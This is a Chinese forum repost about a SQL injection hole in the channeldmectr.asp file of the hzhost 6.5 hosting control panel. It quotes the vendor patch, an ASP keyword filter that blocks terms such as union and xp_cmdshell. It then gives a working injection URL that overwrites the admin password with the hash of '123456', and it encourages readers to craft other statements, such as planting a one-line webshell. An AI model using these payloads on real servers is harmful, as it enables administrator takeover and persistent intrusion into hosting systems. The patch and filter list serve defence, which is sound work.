• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞补丁)

    发布者: 天下网吧 | 发布时间: 2025-6-27 16:27| 查看数: 36| 评论数: 0|帖子模式

    这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数.
    正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码:

    复制代码代码如下:
    Function SafeRequest(ParaName)
    Dim ParaValue
    ParaValue=Request(ParaName)
    if IsNumeric(ParaValue) then
    SafeRequest=ParaValue
    exit Function
    else
    ParaValuetemp=lcase(ParaValue)
    tempvalue="select|insert|delete|union|
    join|script|applet|object|’|drop|update|truncate|
    create|xp_cmdshell|exec|alter|cast|rename|modify”
    temps=split(tempvalue,”|”)
    for mycount=0 to ubound(temps)
    if Instr(ParaValuetemp,temps(mycount)) > 0 and lcase(ParaName)<>”module” then
    call errorpage(-2,”您提交的内容包含了字符["&temps(mycount)&"],请去除后重新提交或联系我们…”)
    response.end
    end if
    next
    SafeRequest=ParaValue
    end if
    End function

    代码的大概意思是对其中红色部分的参数进行过滤,禁止提交,防止执行构造好的SQL语句.
    利用方法如下:
    http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);{我们构造的语句}–
    下面给出一个示范语句:
    http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);Update [memlst] SET u_pss=’e10adc3949ba59abbe56e057f20f883e’ Where u_nme=’admin’–
    语句的意思是将管理员账号admin的密码改为123456.
    当然大家也可以灵活运用,构造其他语句,比如写一句话马进去之类的,这里省略.
    我这个人比较善良,放出独家收藏华众近期出现的所有漏洞的补丁,有需要的朋友可以下载.
    补丁下载地址
    (本文为普瑞斯特编辑整理) http://www.hacksb.cn

    来源:https://www.jb51.net/hack/18971.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表